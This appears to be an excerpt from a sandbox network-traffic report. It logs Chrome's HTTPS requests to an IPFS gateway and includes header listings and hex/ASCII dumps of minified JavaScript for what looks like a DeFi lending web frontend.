                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 6f 53 74 72 69 6e 67 28 29 29 7d 2c 73 69 7a 65 3a 22 73 6d 61 6c 6c 22 2c 73 78 3a 7b 6d 74 3a 36 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 70 2e 6a 73 78 29 28 6e 2e 63 43 2c 7b 69 64 3a 22 43 6f 70 79 20 65 72 72 6f 72 20 74 65 78 74 22 7d 29 2c 28 30 2c 70 2e 6a 73 78 29 28 61 2e 5a 2c 7b 73 78 3a 7b 6d 6c 3a 2e 35 2c 66 6f 6e 74 53 69 7a 65 3a 22 31 32 70 78 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 70 2e 6a 73 78 29 28 73 2e 5a 2c 7b 7d 29 7d 29 5d 7d 29 5d 7d 29 2c 28 30 2c 70 2e 6a 73 78 29 28 69 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 2c 6d 74 3a 31 32 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 70 2e 6a 73 78 29 28 64 2e 5a 2c 7b 6f 6e 43 6c 69 63
                                                                                                                                                                                                                                                  Data Ascii: oString())},size:"small",sx:{mt:6},children:[(0,p.jsx)(n.cC,{id:"Copy error text"}),(0,p.jsx)(a.Z,{sx:{ml:.5,fontSize:"12px"},children:(0,p.jsx)(s.Z,{})})]})]}),(0,p.jsx)(i.Z,{sx:{display:"flex",flexDirection:"column",mt:12},children:(0,p.jsx)(d.Z,{onClic
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 73 65 41 73 73 65 74 53 79 6d 62 6f 6c 3a 57 2e 73 79 6d 62 6f 6c 3b 72 65 74 75 72 6e 28 30 2c 76 2e 6a 73 78 73 29 28 69 2e 68 76 2c 7b 61 73 73 65 74 3a 57 2c 63 68 69 6c 64 72 65 6e 3a 5b 21 45 2e 73 75 63 63 65 73 73 26 26 28 30 2c 76 2e 6a 73 78 29 28 78 2e 45 2c 7b 74 69 74 6c 65 3a 67 2c 73 79 6d 62 6f 6c 3a 68 3f 76 6f 69 64 20 30 3a 4d 7d 29 2c 4c 26 26 21 6b 26 26 28 30 2c 76 2e 6a 73 78 29 28 6d 2e 49 2c 7b 6e 65 74 77 6f 72 6b 4e 61 6d 65 3a 28 30 2c 75 2e 4d 6f 29 28 42 29 2e 6e 61 6d 65 2c 63 68 61 69 6e 49 64 3a 42 2c 65 76 65 6e 74 3a 7b 65 76 65 6e 74 4e 61 6d 65 3a 70 2e 76 68 2e 53 57 49 54 43 48 5f 4e 45 54 57 4f 52 4b 2c 65 76 65 6e 74 50 61 72 61 6d 73 3a 7b 61 73 73 65 74 3a 6a 7d 7d 7d 29 2c 62 28 7b 69 73 57 72 6f 6e 67 4e 65 74
                                                                                                                                                                                                                                                  Data Ascii: seAssetSymbol:W.symbol;return(0,v.jsxs)(i.hv,{asset:W,children:[!E.success&&(0,v.jsx)(x.E,{title:g,symbol:h?void 0:M}),L&&!k&&(0,v.jsx)(m.I,{networkName:(0,u.Mo)(B).name,chainId:B,event:{eventName:p.vh.SWITCH_NETWORK,eventParams:{asset:j}}}),b({isWrongNet
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 22 69 73 20 6e 6f 74 22 2c 22 20 75 73 65 64 20 61 73 20 63 6f 6c 6c 61 74 65 72 61 6c 22 5d 7d 29 2c 62 26 26 28 30 2c 66 2e 6a 73 78 29 28 61 2e 5a 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 66 2e 6a 73 78 29 28 6e 2e 63 43 2c 7b 69 64 3a 22 59 6f 75 20 73 77 69 74 63 68 65 64 20 74 6f 20 7b 30 7d 20 72 61 74 65 22 2c 76 61 6c 75 65 73 3a 7b 30 3a 62 3d 3d 3d 6f 2e 74 6b 2e 56 61 72 69 61 62 6c 65 3f 22 76 61 72 69 61 62 6c 65 22 3a 22 73 74 61 62 6c 65 22 7d 7d 29 7d 29 2c 79 26 26 68 26 26 28 30 2c 66 2e 6a 73 78 73 29 28 69 2e 5a 2c 7b 73 78 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 7b 62 6f 72 64 65 72 3a 22 64 61 72 6b 22 3d 3d 3d 65 2e 70 61 6c 65 74 74 65 2e 6d 6f 64 65 3f 22 31 70 78 20 73 6f 6c 69 64 20 22 2e 63 6f 6e 63 61 74 28
                                                                                                                                                                                                                                                  Data Ascii: "is not"," used as collateral"]}),b&&(0,f.jsx)(a.Z,{children:(0,f.jsx)(n.cC,{id:"You switched to {0} rate",values:{0:b===o.tk.Variable?"variable":"stable"}})}),y&&h&&(0,f.jsxs)(i.Z,{sx:function(e){return{border:"dark"===e.palette.mode?"1px solid ".concat(


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  35192.168.2.549746209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC739OUTGET /_next/static/chunks/6504.d2701b5d1c9eba02.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:42 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 15198
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreigindxcv35pthlj774za7jzsv57ddnf42agbeftshd6biwfbs6mgy"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/6504.d2701b5d1c9eba02.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreigindxcv35pthlj774za7jzsv57ddnf42agbeftshd6biwfbs6mgy
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 7467999
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 37 61 39 38 34 34 32 63 32 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e417a98442c2-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 35 30 34 5d 2c 7b 38 39 37 32 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 38 37 34 36 32 29 2c 6f 3d 72 28 36 33 33 36 36 29 2c 69 3d 72 28 36 37 32 39 34 29 2c 61 3d 72 28 38 36 30 31 30 29 2c 73 3d 72 28 39 34 37 38 30 29 2c 6c 3d 72 28 38 31 37 31 39 29 2c 63 3d 72 28 37 38 38 38 34 29 2c 75 3d 72 28 33 36 36 32 32 29 2c 64 3d 72 28 33 34 38 36 37 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 72 65 74 75 72 6e 28
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6504],{89722:function(e,t,r){r.d(t,{Z:function(){return b}});var n=r(87462),o=r(63366),i=r(67294),a=r(86010),s=r(94780),l=r(81719),c=r(78884),u=r(36622),d=r(34867);function m(e){return(
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 73 61 62 6c 65 64 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 64 69 73 61 62 6c 65 64 2c 69 6e 68 65 72 69 74 3a 76 6f 69 64 20 30 7d 5b 74 2e 63 6f 6c 6f 72 5d 7d 29 29 29 2c 68 3d 69 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 63 6f 6e 73 74 20 72 3d 28 30 2c 63 2e 5a 29 28 7b 70 72 6f 70 73 3a 65 2c 6e 61 6d 65 3a 22 4d 75 69 49 63 6f 6e 22 7d 29 2c 7b 62 61 73 65 43 6c 61 73 73 4e 61 6d 65 3a 69 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 6c 2c 63 6f 6c 6f 72 3a 64 3d 22 69 6e 68 65 72 69 74 22 2c 63 6f 6d 70 6f 6e 65 6e 74 3a 68 3d 22 73 70 61 6e 22 2c 66 6f 6e 74 53 69 7a 65 3a 62 3d 22 6d 65 64 69 75 6d 22 7d 3d 72 2c 79 3d 28 30 2c
                                                                                                                                                                                                                                                  Data Ascii: sabled:(e.vars||e).palette.action.disabled,inherit:void 0}[t.color]}))),h=i.forwardRef((function(e,t){const r=(0,c.Z)({props:e,name:"MuiIcon"}),{baseClassName:i="material-icons",className:l,color:d="inherit",component:h="span",fontSize:b="medium"}=r,y=(0,
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 72 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 64 3d 5b 22 22 2c 22 4b 22 2c 22 4d 22 2c 22 42 22 2c 22 54 22 2c 22 50 22 2c 22 45 22 2c 22 5a 22 2c 22 59 22 5d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 76 61 6c 75 65 2c 72 3d 65 2e 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 2c 6e 3d 76 6f 69 64 20 30 3d 3d 3d 72 3f 32 3a 72 2c 6f 3d 65 2e 72 6f 75 6e 64 44 6f 77 6e 2c 61 3d 65 2e 63 6f 6d 70 61 63 74 54 68 72 65 73 68 6f 6c 64 2c 73 3d 28 30 2c 69 2e 68 45 29 28 74 29
                                                                                                                                                                                                                                                  Data Ascii: ).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var d=["","K","M","B","T","P","E","Z","Y"],m=function(e){var t=e.value,r=e.visibleDecimals,n=void 0===r?2:r,o=e.roundDown,a=e.compactThreshold,s=(0,i.hE)(t)
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 7c 68 2e 76 61 72 69 61 6e 74 2c 63 6f 6c 6f 72 3a 6d 7c 7c 22 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 22 2c 63 68 69 6c 64 72 65 6e 3a 22 3c 22 7d 29 2c 22 75 73 64 22 3d 3d 3d 28 6e 75 6c 6c 3d 3d 3d 72 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 26 26 21 63 26 26 28 30 2c 73 2e 6a 73 78 29 28 61 2e 5a 2c 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 22 73 70 61 6e 22 2c 73 78 3a 7b 6d 72 3a 2e 35 7d 2c 76 61 72 69 61 6e 74 3a 64 7c 7c 68 2e 76 61 72 69 61 6e 74 2c 63 6f 6c 6f 72 3a 6d 7c 7c 22 74 65 78 74 2e 73 65 63 6f 6e 64 61 72 79 22 2c 63 68 69 6c 64 72 65 6e 3a 22 24 22 7d 29 2c 6a 3f 28 30 2c 73 2e 6a 73 78 29 28 70 2c 7b 76 61 6c 75 65 3a 78 2c 76 69 73 69 62 6c 65 44 65 63 69 6d 61 6c 73 3a
                                                                                                                                                                                                                                                  Data Ascii: |h.variant,color:m||"text.secondary",children:"<"}),"usd"===(null===r||void 0===r?void 0:r.toLowerCase())&&!c&&(0,s.jsx)(a.Z,{component:"span",sx:{mr:.5},variant:d||h.variant,color:m||"text.secondary",children:"$"}),j?(0,s.jsx)(p,{value:x,visibleDecimals:
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 72 29 29 3a 68 28 4f 62 6a 65 63 74 28 72 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 72 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 79 28 65 29 7b 76 61 72 20 74 3d 65 2e 73 79 6d 62 6f 6c 2c 72 3d 65 2e 6f 6e 49 6d 61 67 65 47 65 6e 65 72 61 74 65 64 2c 6e 3d 65 2e 61 54 6f 6b 65 6e 2c 6f 3d 28 30 2c 63 2e 75 73 65 52 65 66 29
                                                                                                                                                                                                                                                  Data Ascii: iptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):h(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}function y(e){var t=e.symbol,r=e.onImageGenerated,n=e.aToken,o=(0,c.useRef)
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 74 6f 6b 65 6e 73 2f 22 2e 63 6f 6e 63 61 74 28 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 22 2e 73 76 67 22 29 2c 6f 6e 4c 6f 61 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 28 21 31 29 7d 7d 29 2c 6e 26 26 28 30 2c 64 2e 6a 73 78 29 28 67 2c 7b 72 65 66 3a 69 7d 29 5d 7d 29 7d 76 61 72 20 67 3d 28 30 2c 63 2e 66 6f 72 77 61 72 64 52 65 66 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 65 2e 73 79 6d 62 6f 6c 3b 72 65 74 75 72 6e 28 30 2c 64 2e 6a 73 78 73 29 28 22 73 76 67 22 2c 7b 73 74 79 6c 65 3a 7b 70 6f 73 69 74 69 6f 6e 3a 22 61 62 73 6f 6c 75 74 65 22 2c 74 6f 70 3a 30 2c 6c 65 66 74 3a 30 2c 77 69 64 74 68 3a 22 31 30 30 25 22 2c 68 65 69 67 68 74 3a 22 31 30 30 25 22 7d 2c 72 65 66 3a 74 2c 69 64 3a
                                                                                                                                                                                                                                                  Data Ascii: tokens/".concat(t.toLowerCase(),".svg"),onLoad:function(){return l(!1)}}),n&&(0,d.jsx)(g,{ref:i})]})}var g=(0,c.forwardRef)((function(e,t){var r=e.symbol;return(0,d.jsxs)("svg",{style:{position:"absolute",top:0,left:0,width:"100%",height:"100%"},ref:t,id:
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 2e 34 20 31 32 38 2e 39 37 37 20 31 32 38 2e 39 37 37 20 30 20 30 20 31 20 31 32 38 20 32 35 36 7a 6d 30 2d 32 34 32 2e 32 38 37 61 31 31 35 2e 31 34 35 20 31 31 35 2e 31 34 35 20 30 20 30 20 30 2d 32 33 2e 30 33 33 20 32 2e 33 32 32 41 31 31 33 2e 36 35 37 20 31 31 33 2e 36 35 37 20 30 20 30 20 30 20 36 34 2e 31 20 33 33 2e 32 33 32 61 31 31 34 2e 36 32 32 20 31 31 34 2e 36 32 32 20 30 20 30 20 30 2d 34 31 2e 34 20 35 30 2e 32 38 33 20 31 31 33 2e 37 20 31 31 33 2e 37 20 30 20 30 20 30 2d 36 2e 36 35 39 20 32 31 2e 34 35 32 20 31 31 35 2e 34 20 31 31 35 2e 34 20 30 20 30 20 30 20 30 20 34 36 2e 30 36 35 20 31 31 33 2e 36 36 20 31 31 33 2e 36 36 20 30 20 30 20 30 20 31 37 2e 32 20 34 30 2e 38 36 36 20 31 31 34 2e 36 32 37 20 31 31 34 2e 36 32 37 20 30 20
                                                                                                                                                                                                                                                  Data Ascii: .4 128.977 128.977 0 0 1 128 256zm0-242.287a115.145 115.145 0 0 0-23.033 2.322A113.657 113.657 0 0 0 64.1 33.232a114.622 114.622 0 0 0-41.4 50.283 113.7 113.7 0 0 0-6.659 21.452 115.4 115.4 0 0 0 0 46.065 113.66 113.66 0 0 0 17.2 40.866 114.627 114.627 0
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 78 29 28 22 69 6d 67 22 2c 7b 73 72 63 3a 22 64 65 66 61 75 6c 74 22 21 3d 3d 73 26 26 72 3f 72 3a 22 2f 69 63 6f 6e 73 2f 74 6f 6b 65 6e 73 2f 64 65 66 61 75 6c 74 2e 73 76 67 22 2c 77 69 64 74 68 3a 22 31 30 30 25 22 2c 68 65 69 67 68 74 3a 22 31 30 30 25 22 2c 61 6c 74 3a 22 22 2e 63 6f 6e 63 61 74 28 74 2c 22 20 69 63 6f 6e 22 29 2c 6f 6e 45 72 72 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 28 22 64 65 66 61 75 6c 74 22 29 7d 7d 29 7d 29 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 65 29 7b 76 61 72 20 74 3d 65 2e 73 79 6d 62 6f 6c 73 2c 72 3d 65 2e 62 61 64 67 65 53 79 6d 62 6f 6c 2c 6e 3d 28 30 2c 69 2e 5a 29 28 65 2c 66 29 3b 72 65 74 75 72 6e 20 72 3f 28 30 2c 64 2e 6a 73 78 29 28 6c 2e 5a 2c 7b 62 61 64 67 65 43 6f 6e 74 65
                                                                                                                                                                                                                                                  Data Ascii: x)("img",{src:"default"!==s&&r?r:"/icons/tokens/default.svg",width:"100%",height:"100%",alt:"".concat(t," icon"),onError:function(){return l("default")}})})}))}function j(e){var t=e.symbols,r=e.badgeSymbol,n=(0,i.Z)(e,f);return r?(0,d.jsx)(l.Z,{badgeConte
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1369INData Raw: 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 28 30 2c 66 2e 7a 29 28 29 2e 70 6f 6f 6c 54 6f 6b 65 6e 73 42 61 6c 61 6e 63 65 53 65 72 76 69 63 65 3b 72 65 74 75 72 6e 28 30 2c 6d 2e 68 29 28 7b 71 75 65 72 69 65 73 3a 65 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 3b 74 25 32 3f 76 28 4f 62 6a 65 63 74 28 72 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 28 30 2c 64 2e 5a 29 28 65 2c 74 2c 72 5b 74 5d 29
                                                                                                                                                                                                                                                  Data Ascii: h=function(e,t,r){var n=(0,f.z)().poolTokensBalanceService;return(0,m.h)({queries:e.map((function(e){return function(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?v(Object(r),!0).forEach((function(t){(0,d.Z)(e,t,r[t])


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  36192.168.2.549749209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC739OUTGET /_next/static/chunks/4700.1016c158c2995fc4.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC1361INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:42 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 377002
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafybeigzzrytbgdveykaqstxnhgtd5iwr252qk65k5clforsnkavpbwegi"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/4700.1016c158c2995fc4.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafybeigzzrytbgdveykaqstxnhgtd5iwr252qk65k5clforsnkavpbwegi
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028476
                                                                                                                                                                                                                                                  2024-09-28 04:11:42 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 37 61 39 65 64 34 33 38 64 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e417a9ed438d-EWR
